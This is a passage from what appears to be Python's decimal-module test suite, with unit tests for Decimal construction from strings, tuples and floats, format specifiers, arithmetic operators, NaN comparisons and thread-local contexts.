for lead in ["", ' ', '\u00a0', '\u205f']:
for trail in ["", ' ', '\u00a0', '\u205f']:
self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
'9.311E+28')
with localcontext() as c:
c.traps[InvalidOperation] = True
# Invalid string
self.assertRaises(InvalidOperation, Decimal, "xyz")
# Two arguments max
self.assertRaises(TypeError, Decimal, "1234", "x", "y")
# space within the numeric part
self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")
# unicode whitespace
self.assertRaises(InvalidOperation, Decimal, "\u00a0")
self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")
# embedded NUL
self.assertRaises(InvalidOperation, Decimal, "12\u00003")
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
Decimal = self.decimal.Decimal
context = self.decimal.Context()
s = _testcapi.unicode_legacy_string('9.999999')
self.assertEqual(str(Decimal(s)), '9.999999')
self.assertEqual(str(context.create_decimal(s)), '9.999999')
def test_explicit_from_tuples(self):
Decimal = self.decimal.Decimal
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#inf
d = Decimal( (0, (), "F") )
self.assertEqual(str(d), 'Infinity')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )
def test_explicit_from_list(self):
Decimal = self.decimal.Decimal
d = Decimal([0, [0], 0])
self.assertEqual(str(d), '0')
d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
self.assertEqual(str(d), '-4.34913534E-17')
def test_explicit_from_bool(self):
Decimal = self.decimal.Decimal
self.assertIs(bool(Decimal(0)), False)
self.assertIs(bool(Decimal(1)), True)
self.assertEqual(Decimal(False), Decimal(0))
self.assertEqual(Decimal(True), Decimal(1))
def test_explicit_from_Decimal(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
@requires_IEEE_754
def test_explicit_from_float(self):
Decimal = self.decimal.Decimal
r = Decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertTrue(Decimal(float('nan')).is_qnan())
self.assertTrue(Decimal(float('inf')).is_infinite())
self.assertTrue(Decimal(float('-inf')).is_infinite())
self.assertEqual(str(Decimal(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(Decimal(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(Decimal(float('-inf'))),
str(Decimal('-Infinity')))
self.assertEqual(str(Decimal(float('-0.0'))),
str(Decimal('-0')))
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(Decimal(x))) # roundtrip
def test_explicit_context_create_decimal(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
Rounded = self.decimal.Rounded
nc = copy.copy(self.decimal.getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# from None
self.assertRaises(TypeError, nc.create_decimal, None)
# from int
d = nc.create_decimal(456)
self.assertIsInstance(d, Decimal)
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# from string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# leading and trailing whitespace should result in a NaN;
# spaces are already checked in Cowlishaw's test-suite, so
# here we just check that a trailing newline results in a NaN
self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')
# from tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# from Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
# more integers
nc.prec = 28
nc.traps[InvalidOperation] = True
for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0,
2**31-1, 2**31, 2**63-1, 2**63]:
d = nc.create_decimal(v)
self.assertTrue(isinstance(d, Decimal))
self.assertEqual(int(d), v)
nc.prec = 3
nc.traps[Rounded] = True
self.assertRaises(Rounded, nc.create_decimal, 1234)
# from string
nc.prec = 28
self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
self.assertEqual(str(nc.create_decimal('45')), '45')
self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')
# invalid arguments
self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")
# too many NaN payload digits
nc.prec = 3
self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
self.assertRaises(InvalidOperation, nc.create_decimal,
Decimal('NaN12345'))
nc.traps[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
nc.flags[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
def test_explicit_context_create_from_float(self):
Decimal = self.decimal.Decimal
nc = self.decimal.Context()
r = nc.create_decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r), '0.1000000000000000055511151231')
self.assertTrue(nc.create_decimal(float('nan')).is_qnan())
self.assertTrue(nc.create_decimal(float('inf')).is_infinite())
self.assertTrue(nc.create_decimal(float('-inf')).is_infinite())
self.assertEqual(str(nc.create_decimal(float('nan'))),
str(nc.create_decimal('NaN')))
self.assertEqual(str(nc.create_decimal(float('inf'))),
str(nc.create_decimal('Infinity')))
self.assertEqual(str(nc.create_decimal(float('-inf'))),
str(nc.create_decimal('-Infinity')))
self.assertEqual(str(nc.create_decimal(float('-0.0'))),
str(nc.create_decimal('-0')))
nc.prec = 100
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip
def test_unicode_digits(self):
Decimal = self.decimal.Decimal
test_values = {
'\uff11': '1',
'\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
'-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
}
for input, expected in test_values.items():
self.assertEqual(str(Decimal(input)), expected)
class CExplicitConstructionTest(ExplicitConstructionTest):
decimal = C
class PyExplicitConstructionTest(ExplicitConstructionTest):
decimal = P
class ImplicitConstructionTest(unittest.TestCase):
'''Unit tests for Implicit Construction cases of Decimal.'''
def test_implicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals())
def test_implicit_from_int(self):
Decimal = self.decimal.Decimal
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())
def test_implicit_from_float(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())
def test_implicit_from_Decimal(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
Decimal = self.decimal.Decimal
# Allow other classes to be trained to interact with Decimals
class E:
def __divmod__(self, other):
return 'divmod ' + str(other)
def __rdivmod__(self, other):
return str(other) + ' rdivmod'
def __lt__(self, other):
return 'lt ' + str(other)
def __gt__(self, other):
return 'gt ' + str(other)
def __le__(self, other):
return 'le ' + str(other)
def __ge__(self, other):
return 'ge ' + str(other)
def __eq__(self, other):
return 'eq ' + str(other)
def __ne__(self, other):
return 'ne ' + str(other)
self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods and then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('/', '__truediv__', '__rtruediv__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
for sym, lop, rop in oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
class CImplicitConstructionTest(ImplicitConstructionTest):
decimal = C
class PyImplicitConstructionTest(ImplicitConstructionTest):
decimal = P
class FormatTest(unittest.TestCase):
'''Unit tests for the format function.'''
def test_formatting(self):
Decimal = self.decimal.Decimal
# triples giving a format, a Decimal, and the expected result
test_values = [
('e', '0E-15', '0e-15'),
('e', '2.3E-15', '2.3e-15'),
('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
('e', '2.30000E-15', '2.30000e-15'),
('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
('e', '1.5', '1.5e+0'),
('e', '0.15', '1.5e-1'),
('e', '0.015', '1.5e-2'),
('e', '0.0000000000015', '1.5e-12'),
('e', '15.0', '1.50e+1'),
('e', '-15', '-1.5e+1'),
('e', '0', '0e+0'),
('e', '0E1', '0e+1'),
('e', '0.0', '0e-1'),
('e', '0.00', '0e-2'),
('.6e', '0E-15', '0.000000e-9'),
('.6e', '0', '0.000000e+6'),
('.6e', '9.999999', '9.999999e+0'),
('.6e', '9.9999999', '1.000000e+1'),
('.6e', '-1.23e5', '-1.230000e+5'),
('.6e', '1.23456789e-3', '1.234568e-3'),
('f', '0', '0'),
('f', '0.0', '0.0'),
('f', '0E-2', '0.00'),
('f', '0.00E-8', '0.0000000000'),
('f', '0E1', '0'), # loses exponent information
('f', '3.2E1', '32'),
('f', '3.2E2', '320'),
('f', '3.20E2', '320'),
('f', '3.200E2', '320.0'),
('f', '3.2E-6', '0.0000032'),
('.6f', '0E-15', '0.000000'), # all zeros treated equally
('.6f', '0E1', '0.000000'),
('.6f', '0', '0.000000'),
('.0f', '0', '0'), # no decimal point
('.0f', '0e-2', '0'),
('.0f', '3.14159265', '3'),
('.1f', '3.14159265', '3.1'),
('.4f', '3.14159265', '3.1416'),
('.6f', '3.14159265', '3.141593'),
('.7f', '3.14159265', '3.1415926'), # round-half-even!
('.8f', '3.14159265', '3.14159265'),
('.9f', '3.14159265', '3.141592650'),
('g', '0', '0'),
('g', '0.0', '0.0'),
('g', '0E1', '0e+1'),
('G', '0E1', '0E+1'),
('g', '0E-5', '0.00000'),
('g', '0E-6', '0.000000'),
('g', '0E-7', '0e-7'),
('g', '-0E2', '-0e+2'),
('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
('.0n', '3.14159265', '3'), # same for 'n'
('.1g', '3.14159265', '3'),
('.2g', '3.14159265', '3.1'),
('.5g', '3.14159265', '3.1416'),
('.7g', '3.14159265', '3.141593'),
('.8g', '3.14159265', '3.1415926'), # round-half-even!
('.9g', '3.14159265', '3.14159265'),
('.10g', '3.14159265', '3.14159265'), # don't pad
('%', '0E1', '0%'),
('%', '0E0', '0%'),
('%', '0E-1', '0%'),
('%', '0E-2', '0%'),
('%', '0E-3', '0.0%'),
('%', '0E-4', '0.00%'),
('.3%', '0', '0.000%'), # all zeros treated equally
('.3%', '0E10', '0.000%'),
('.3%', '0E-10', '0.000%'),
('.3%', '2.34', '234.000%'),
('.3%', '1.234567', '123.457%'),
('.0%', '1.23', '123%'),
('e', 'NaN', 'NaN'),
('f', '-NaN123', '-NaN123'),
('+g', 'NaN456', '+NaN456'),
('.3e', 'Inf', 'Infinity'),
('.16f', '-Inf', '-Infinity'),
('.0g', '-sNaN', '-sNaN'),
('', '1.00', '1.00'),
# test alignment and padding
('6', '123', ' 123'),
('<6', '123', '123 '),
('>6', '123', ' 123'),
('^6', '123', ' 123 '),
('=+6', '123', '+ 123'),
('#<10', 'NaN', 'NaN#######'),
('#<10', '-4.3', '-4.3######'),
('#<+10', '0.0130', '+0.0130###'),
('#< 10', '0.0130', ' 0.0130###'),
('@>10', '-Inf', '@-Infinity'),
('#>5', '-Inf', '-Infinity'),
('?^5', '123', '?123?'),
('%^6', '123', '%123%%'),
(' ^6', '-45.6', '-45.6 '),
('/=10', '-45.6', '-/////45.6'),
('/=+10', '45.6', '+/////45.6'),
('/= 10', '45.6', ' /////45.6'),
('\x00=10', '-inf', '-\x00Infinity'),
('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),
# thousands separator
(',', '1234567', '1,234,567'),
(',', '123456', '123,456'),
(',', '12345', '12,345'),
(',', '1234', '1,234'),
(',', '123', '123'),
(',', '12', '12'),
(',', '1', '1'),
(',', '0', '0'),
(',', '-1234567', '-1,234,567'),
(',', '-123456', '-123,456'),
('7,', '123456', '123,456'),
('8,', '123456', ' 123,456'),
('08,', '123456', '0,123,456'), # special case: extra 0 needed
('+08,', '123456', '+123,456'), # but not if there's a sign
(' 08,', '123456', ' 123,456'),
('08,', '-123456', '-123,456'),
('+09,', '123456', '+0,123,456'),
# ... with fractional part...
('07,', '1234.56', '1,234.56'),
('08,', '1234.56', '1,234.56'),
('09,', '1234.56', '01,234.56'),
('010,', '1234.56', '001,234.56'),
('011,', '1234.56', '0,001,234.56'),
('012,', '1234.56', '0,001,234.56'),
('08,.1f', '1234.5', '01,234.5'),
# no thousands separators in fraction part
(',', '1.23456789', '1.23456789'),
(',%', '123.456789', '12,345.6789%'),
(',e', '123456', '1.23456e+5'),
(',E', '123456', '1.23456E+5'),
# issue 6850
('a=-7.0', '0.12345', 'aaaa0.1'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
# bytes format argument
self.assertRaises(TypeError, Decimal(1).__format__, b'-020')
def test_n_format(self):
Decimal = self.decimal.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst]) if self.decimal == C else lst
def get_fmt(x, override=None, fmt='n'):
if self.decimal == C:
return Decimal(x).__format__(fmt, override)
else:
return Decimal(x).__format__(fmt, _localeconv=override)
# Set up some localeconv-like dictionaries
en_US = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
fr_FR = {
'decimal_point' : ',',
'grouping' : make_grouping([CHAR_MAX]),
'thousands_sep' : ''
}
ru_RU = {
'decimal_point' : ',',
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : ' '
}
crazy = {
'decimal_point' : '&',
'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
'thousands_sep' : '-'
}
dotsep_wide = {
'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
}
self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')
self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')
self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')
# zero padding
self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')
self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')
self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')
# wide char separator and decimal point
self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
'-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')
@run_with_locale('LC_ALL', 'ps_AF')
def test_wide_char_separator_decimal_point(self):
# locale with wide char separator and decimal point
import locale
Decimal = self.decimal.Decimal
decimal_point = locale.localeconv()['decimal_point']
thousands_sep = locale.localeconv()['thousands_sep']
if decimal_point != '\u066b':
self.skipTest('inappropriate decimal point separator'
'({!a} not {!a})'.format(decimal_point, '\u066b'))
if thousands_sep != '\u066c':
self.skipTest('inappropriate thousands separator'
'({!a} not {!a})'.format(thousands_sep, '\u066c'))
self.assertEqual(format(Decimal('100000000.123'), 'n'),
'100\u066c000\u066c000\u066b123')
class CFormatTest(FormatTest):
decimal = C
class PyFormatTest(FormatTest):
decimal = P
class ArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
Decimal = self.decimal.Decimal
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
def test_nan_comparisons(self):
# comparisons involving signaling nans signal InvalidOperation
# order comparisons (<, <=, >, >=) involving only quiet nans
# also signal InvalidOperation
# equality comparisons (==, !=) involving only quiet nans
# don't signal, but return False or True respectively.
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
n = Decimal('NaN')
s = Decimal('sNaN')
i = Decimal('Inf')
f = Decimal('2')
qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
order_ops = operator.lt, operator.le, operator.gt, operator.ge
equality_ops = operator.eq, operator.ne
# results when InvalidOperation is not trapped
for x, y in qnan_pairs + snan_pairs:
for op in order_ops + equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
# repeat the above, but this time trap the InvalidOperation
with localcontext() as ctx:
ctx.traps[InvalidOperation] = 1
for x, y in qnan_pairs:
for op in equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for "
"operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
for x, y in snan_pairs:
for op in equality_ops:
self.assertRaises(InvalidOperation, operator.eq, x, y)
self.assertRaises(InvalidOperation, operator.ne, x, y)
for x, y in qnan_pairs + snan_pairs:
for op in order_ops:
self.assertRaises(InvalidOperation, op, x, y)
def test_copy_sign(self):
Decimal = self.decimal.Decimal
d = Decimal(1).copy_sign(Decimal(-2))
self.assertEqual(Decimal(1).copy_sign(-2), d)
self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
class CArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = C
class PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = P
# The following are two functions used to test threading in the next class
def thfunc1(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
cls.finish1.set()
cls.synchro.wait()
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
cls.assertTrue(c2.flags[DivisionByZero])
with localcontext() as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertTrue(c3.flags[DivisionByZero])
cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
cls.assertTrue(c3.flags[InvalidOperation])
del c3
cls.assertFalse(c2.flags[InvalidOperation])
del c2
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333333333'))
c1 = getcontext()
cls.assertTrue(c1.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(c1.flags[sig])
def thfunc2(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
thiscontext = getcontext()
thiscontext.prec = 18
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
cls.assertTrue(c2.flags[Overflow])
with localcontext(thiscontext) as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertFalse(c3.flags[Overflow])
c3.traps[Underflow] = True
cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
cls.assertTrue(c3.flags[Underflow])
del c3
cls.assertFalse(c2.flags[Underflow])
cls.assertFalse(c2.traps[Underflow])
del c2
cls.synchro.set()
cls.finish2.set()
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333'))
cls.assertFalse(thiscontext.traps[Underflow])
